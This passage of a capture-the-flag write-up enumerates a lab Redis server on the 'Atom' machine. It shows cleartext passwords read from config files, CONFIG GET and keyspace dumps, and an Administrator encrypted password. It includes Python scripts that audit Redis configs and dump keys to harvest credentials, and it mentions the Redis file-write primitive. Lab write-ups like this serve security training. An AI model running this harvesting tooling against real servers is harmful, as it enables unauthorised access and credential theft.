Redis Configuration


Checking for Redis configuration files after conducting basic enumeration

PS C:\Program Files> ls Redis
    Directory: C:\Program Files\Redis
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          4/2/2021   7:31 AM                Logs                                                                 
-a----          7/1/2016   3:54 PM           1024 EventLog.dll                                                         
-a----          7/1/2016   3:52 PM          12618 Redis on Windows Release Notes.docx                                  
-a----          7/1/2016   3:52 PM          16769 Redis on Windows.docx                                                
-a----          7/1/2016   3:55 PM         406016 redis-benchmark.exe                                                  
-a----          7/1/2016   3:55 PM        4370432 redis-benchmark.pdb                                                  
-a----          7/1/2016   3:55 PM         257024 redis-check-aof.exe                                                  
-a----          7/1/2016   3:55 PM        3518464 redis-check-aof.pdb                                                  
-a----          7/1/2016   3:55 PM         268288 redis-check-dump.exe                                                 
-a----          7/1/2016   3:55 PM        3485696 redis-check-dump.pdb                                                 
-a----          7/1/2016   3:55 PM         482304 redis-cli.exe                                                        
-a----          7/1/2016   3:55 PM        4517888 redis-cli.pdb                                                        
-a----          7/1/2016   3:55 PM        1553408 redis-server.exe                                                     
-a----          7/1/2016   3:55 PM        6909952 redis-server.pdb                                                     
-a----          4/2/2021   7:39 AM          43962 redis.windows-service.conf                                           
-a----          4/2/2021   7:37 AM          43960 redis.windows.conf                                                   
-a----          7/1/2016   9:17 AM          14265 Windows Service Documentation.docx                                   

The target Redis server is installed under C:\Program Files\Redis. There are 2 configuration files: redis.windows-service.conf and redis.windows.conf.

CLEARTEXT Password


PS C:\Program Files> cat Redis/*.conf | Where-Object { $_ -notlike '#*' }
 
requirepass kidvscat_yes_kidvscat
 
port 6379
loglevel notice
logfile "Logs/redis_log.txt"
syslog-enabled yes
syslog-ident redis
databases 16
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir ./
 
slave-serve-stale-data yes
slave-read-only yes
 
[...REDACTED...]

Both configuration files contain the same cleartext password in the requirepass directive: kidvscat_yes_kidvscat

I was initially unable to enumerate the target Redis instance because it was locked behind authentication. Now that I have the Redis password, I should be able to continue enumeration.
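The same comment-filtering pass, written as a small Python auditor (an added example, my code rather than the write-up's). It parses directives the way the PowerShell one-liner above does, then flags the settings that matter for enumeration: a cleartext requirepass, no bind, CONFIG left enabled, and where the RDB snapshot lands. SAMPLE_CONF is constructed from the directives shown above and is not the target's complete file.

```python
"""Parse a redis.conf-style file and flag settings that matter for enumeration.
Added example, not from the original write-up. SAMPLE_CONF is constructed from
the directives shown above; it is not the target's complete file."""

SAMPLE_CONF = """\
# Redis configuration file example (comment lines are dropped)
requirepass kidvscat_yes_kidvscat

port 6379
loglevel notice
logfile "Logs/redis_log.txt"
databases 16
dbfilename dump.rdb
dir ./
slave-read-only yes
"""


def parse_conf(text):
    """Return {directive: value} for every non-empty, non-comment line.

    Same filter as the PowerShell one-liner above (drop lines starting with
    '#'), plus the quotes Redis allows around values are stripped. The
    rename-command directive may repeat, so it is collected as a list."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        name = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if name == "rename-command":
            directives.setdefault(name, []).append(value)
        else:
            directives[name] = value.strip('"')
    return directives


def audit_conf(directives):
    """Return [(directive, finding)] for the settings worth acting on."""
    findings = []
    if "requirepass" in directives:
        findings.append(("requirepass", "cleartext password on disk: %s" % directives["requirepass"]))
    else:
        findings.append(("requirepass", "no password; every client is implicitly authenticated"))
    if not directives.get("bind"):
        findings.append(("bind", "absent or empty; on Redis < 3.2 that means listening on every interface"))
    if directives.get("protected-mode") == "no":
        findings.append(("protected-mode", "explicitly disabled"))
    renamed = directives.get("rename-command", [])
    if not any(r.upper().startswith("CONFIG") for r in renamed):
        findings.append(("rename-command", "CONFIG still enabled; CONFIG GET requirepass returns the password"))
    # Where a snapshot lands: CONFIG SET dir/dbfilename followed by SAVE is the
    # classic Redis file-write primitive, so record the defaults either way.
    findings.append(("snapshot", directives.get("dir", "./") + " " + directives.get("dbfilename", "dump.rdb")))
    return findings


if __name__ == "__main__":
    for name, detail in audit_conf(parse_conf(SAMPLE_CONF)):
        print("%-16s %s" % (name, detail))
```

Run it against any redis.windows*.conf pulled off a target to get the same short list the manual read above produced; the protected-mode check only fires when the directive is explicitly set to no, because the directive does not exist before Redis 3.2 and defaults to yes afterwards.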

Redis


┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ redis-cli -h $IP
10.10.10.237:6379> AUTH kidvscat_yes_kidvscat
OK

Authenticated

INFO


10.10.10.237:6379> info
# Server
redis_version:3.0.504
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a4f7a6e86f2d60b3
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:WinSock_IOCP
process_id:7928
run_id:0cac6bd47cf18678a171e36577a12518d3574f9b
tcp_port:6379
uptime_in_seconds:42221
uptime_in_days:0
hz:10
lru_clock:10309810
config_file:C:\Program Files\Redis\redis.windows-service.conf
 
# Clients
connected_clients:5
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
 
# Memory
used_memory:778080
used_memory_human:759.84K
used_memory_rss:740312
used_memory_peak:778080
used_memory_peak_human:759.84K
used_memory_lua:36864
mem_fragmentation_ratio:0.95
mem_allocator:jemalloc-3.6.0
 
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1704766405
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
 
# Stats
total_connections_received:23
total_commands_processed:2
instantaneous_ops_per_sec:0
total_net_input_bytes:532
total_net_output_bytes:760
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
 
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
 
# CPU
used_cpu_sys:0.58
used_cpu_user:0.88
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
 
# Cluster
cluster_enabled:0
 
# Keyspace
db0:keys=4,expires=0,avg_ttl=0

Redis 3.0.504 for Windows, 5 connected clients, and a single populated database, db0, holding 4 keys. The config_file value confirms the service runs from redis.windows-service.conf.

CONFIG


10.10.10.237:6379> CONFIG GET *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) "kidvscat_yes_kidvscat"
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) "Logs/redis_log.txt"
 11) "pidfile"
 12) "/var/run/redis.pid"
 13) "maxmemory"
 14) "0"
 15) "maxmemory-samples"
 16) "5"
 17) "timeout"
 18) "0"
 19) "tcp-keepalive"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-entries"
 30) "512"
 31) "list-max-ziplist-value"
 32) "64"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "min-slaves-to-write"
 70) "0"
 71) "min-slaves-max-lag"
 72) "10"
 73) "hz"
 74) "10"
 75) "cluster-node-timeout"
 76) "15000"
 77) "cluster-migration-barrier"
 78) "1"
 79) "cluster-slave-validity-factor"
 80) "10"
 81) "repl-diskless-sync-delay"
 82) "5"
 83) "cluster-require-full-coverage"
 84) "yes"
 85) "no-appendfsync-on-rewrite"
 86) "no"
 87) "slave-serve-stale-data"
 88) "yes"
 89) "slave-read-only"
 90) "yes"
 91) "stop-writes-on-bgsave-error"
 92) "yes"
 93) "daemonize"
 94) "no"
 95) "rdbcompression"
 96) "yes"
 97) "rdbchecksum"
 98) "yes"
 99) "activerehashing"
100) "yes"
101) "repl-disable-tcp-nodelay"
102) "no"
103) "repl-diskless-sync"
104) "no"
105) "aof-rewrite-incremental-fsync"
106) "yes"
107) "aof-load-truncated"
108) "yes"
109) "appendonly"
110) "no"
111) "dir"
112) "c:\\Program Files\\Redis"
113) "maxmemory-policy"
114) "noeviction"
115) "appendfsync"
116) "everysec"
117) "save"
118) "jd 900 jd 300 jd 60"
119) "loglevel"
120) "notice"
121) "client-output-buffer-limit"
122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
123) "unixsocketperm"
124) "0"
125) "slaveof"
126) ""
127) "notify-keyspace-events"
128) ""
129) "bind"
130) ""

The dump.rdb snapshot is written to dir, c:\Program Files\Redis, and bind is empty, so the service accepts connections on every interface. CONFIG GET also returns requirepass in cleartext, so anyone who authenticates once can recover the password from the running instance.

Keyspace


10.10.10.237:6379> INFO keyspace
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
 
10.10.10.237:6379> KEYS *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:ids:User"

The keyspace contains 4 keys, all under the pk: prefix.

"pk:ids:MetaDataClass"


10.10.10.237:6379> GET "pk:ids:MetaDataClass"
(error) WRONGTYPE Operation against a key holding the wrong kind of value

Attempting to GET the first key, "pk:ids:MetaDataClass", fails with WRONGTYPE. GET only works on string values, so the key holds a different data type and has to be read with the command for that type.

10.10.10.237:6379> TYPE "pk:ids:MetaDataClass"
set

The TYPE command identifies the data type of a key. This one is a set.

10.10.10.237:6379> SMEMBERS "pk:ids:MetaDataClass"
1) "ffffffff-ffff-ffff-ffff-ffffffffffff"

Fetching all members of the set with SMEMBERS returns a single member, "ffffffff-ffff-ffff-ffff-ffffffffffff". As the name suggests, this is likely just metadata. Moving on.

"pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"


10.10.10.237:6379> GET "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"

The "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff" key holds a JSON document of schema metadata (SchemaVersion 4.2.0.0 and modification timestamps) rather than anything directly usable. The SchemaVersionModifiedBy value, e8e29158d70d44b1a1ba4949d52790a0, is the same ID that appears in the remaining user key.

"pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"


10.10.10.237:6379> GET "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

The "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0" key contains a JSON user record for the Administrator user with Role Admin and an EncryptedPassword field. The value of that field, Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi, matches the encrypted string found earlier in the PortableKanban configuration file.

PortableKanban has already been confirmed to be vulnerable to offline decryption of its stored passwords. If this credential is also the administrator's system password, privilege escalation is achievable.

"pk:ids:User"


10.10.10.237:6379> GET "pk:ids:User"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> TYPE "pk:ids:User"
set
10.10.10.237:6379> SMEMBERS "pk:ids:User"
1) "e8e29158-d70d-44b1-a1ba-4949d52790a0"

The "pk:ids:User" key is another set with a single member, the ID of the user record above. Nothing else of note.
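The KEYS/TYPE/GET/SMEMBERS sequence above can be scripted once and reused. The dumper below is an added example (my code, not the write-up's): it speaks RESP2 directly, picks the read command from TYPE so it never trips WRONGTYPE, uses SCAN instead of KEYS * so it does not stall a busy server, and then pulls password-like fields out of JSON values, which is how the EncryptedPassword above surfaces. CANNED holds RESP bytes constructed from the redis-cli session above (JSON values trimmed) so the script runs offline; SocketTransport, with host and port as assumptions, is for a live target.

```python
"""Minimal RESP2 client that dumps every key with the read command matching its
TYPE, then looks for password-like fields. Added example, not from the write-up.
CANNED is constructed from the session above (JSON trimmed) so it runs offline."""
import io
import json
import socket

class RedisError(Exception):
    """Error reply from the server, e.g. WRONGTYPE or NOAUTH."""

def encode_resp(value):
    """str/bytes -> bulk string, list -> array (commands never need integers)."""
    if isinstance(value, (list, tuple)):
        return b"*%d\r\n" % len(value) + b"".join(map(encode_resp, value))
    data = value if isinstance(value, bytes) else str(value).encode()
    return b"$%d\r\n%s\r\n" % (len(data), data)

def parse_reply(stream):
    """Decode one RESP2 reply from a binary stream (socket file or BytesIO)."""
    line = stream.readline()
    if not line.endswith(b"\r\n"):
        raise ValueError("truncated reply: %r" % line)
    kind, body = line[:1], line[1:-2]
    if kind == b"+":
        return body.decode()
    if kind == b"-":
        raise RedisError(body.decode())
    if kind == b":":
        return int(body)
    n = int(body)  # bulk-string byte length or array element count; -1 is null
    if n < 0:
        return None
    if kind == b"*":
        return [parse_reply(stream) for _ in range(n)]
    return stream.read(n + 2)[:-2].decode()  # payload plus trailing CRLF

class SocketTransport:  # live connection (host and port are assumptions)
    def __init__(self, host, port=6379, timeout=5):
        self.sock = socket.create_connection((host, port), timeout)
        self.reader = self.sock.makefile("rb")
    def call(self, *args):  # every command goes out as an array of bulk strings
        self.sock.sendall(encode_resp([str(a) for a in args]))
        return parse_reply(self.reader)

class FakeTransport:  # offline stand-in: canned RESP bytes keyed by command
    def __init__(self, replies):
        self.replies = replies
    def call(self, *args):
        return parse_reply(io.BytesIO(self.replies[tuple(str(a) for a in args)]))

def scan_keys(t):
    """SCAN rather than KEYS *: incremental, so it does not stall a busy server."""
    cursor = "0"
    while True:
        cursor, batch = t.call("SCAN", cursor)
        yield from batch
        if cursor == "0":
            return

def dump_keyspace(t, password=None):
    """GET only works on strings (hence the WRONGTYPE above), so dispatch on TYPE."""
    if password:
        t.call("AUTH", password)
    readers = {
        "string": lambda k: t.call("GET", k),
        "set": lambda k: sorted(t.call("SMEMBERS", k)),
        "list": lambda k: t.call("LRANGE", k, 0, -1),
        "hash": lambda k: dict(zip(*[iter(t.call("HGETALL", k))] * 2)),
        "zset": lambda k: t.call("ZRANGE", k, 0, -1, "WITHSCORES"),
    }
    out = {}
    for key in scan_keys(t):
        kind = t.call("TYPE", key)
        out[key] = readers[kind](key) if kind in readers else "<%s: not dumped>" % kind
    return out

def find_credentials(dump):
    """(key, field, value) for password-like fields inside JSON-valued strings."""
    hits = []
    for key, value in dump.items():
        try:
            doc = json.loads(value)
        except (TypeError, ValueError):  # non-string or non-JSON value
            continue
        if isinstance(doc, dict):
            hits += [(key, f, v) for f, v in doc.items() if "password" in f.lower()]
    return hits

# Constructed from the session above: only the commands dump_keyspace issues.
META = "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
USER = "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
CANNED = {
    ("AUTH", "kidvscat_yes_kidvscat"): b"+OK\r\n",
    ("SCAN", "0"): encode_resp(["0", ["pk:ids:MetaDataClass", META, USER, "pk:ids:User"]]),
    ("TYPE", "pk:ids:MetaDataClass"): b"+set\r\n",
    ("SMEMBERS", "pk:ids:MetaDataClass"): encode_resp(["ffffffff-ffff-ffff-ffff-ffffffffffff"]),
    ("TYPE", META): b"+string\r\n",
    ("GET", META): encode_resp('{"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0"}'),
    ("TYPE", USER): b"+string\r\n",
    ("GET", USER): encode_resp('{"id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin"}'),
    ("TYPE", "pk:ids:User"): b"+set\r\n",
    ("SMEMBERS", "pk:ids:User"): encode_resp(["e8e29158-d70d-44b1-a1ba-4949d52790a0"]),
}
```

Offline, `find_credentials(dump_keyspace(FakeTransport(CANNED), password="kidvscat_yes_kidvscat"))` returns the single EncryptedPassword hit from the user key; against a live host, replace FakeTransport(CANNED) with SocketTransport("10.10.10.237") and keep the same AUTH password. The transport is deliberately unpipelined (one command, one reply), which keeps the parser simple and makes the canned bytes a faithful stand-in for the real wire format.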